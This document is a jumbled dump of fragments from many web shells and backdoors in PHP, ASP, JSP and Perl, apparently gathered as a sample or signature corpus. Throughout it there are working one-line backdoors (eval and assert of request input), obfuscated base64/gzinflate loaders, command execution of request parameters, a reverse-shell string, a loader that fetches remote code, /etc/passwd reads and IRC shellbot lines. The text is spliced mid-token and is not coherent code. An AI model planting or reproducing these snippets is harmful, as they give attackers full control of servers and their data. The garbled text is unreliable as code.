$_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= \"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], $_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). add uses as simple 'username = \"password\"' lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' - antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? \"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? \"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh 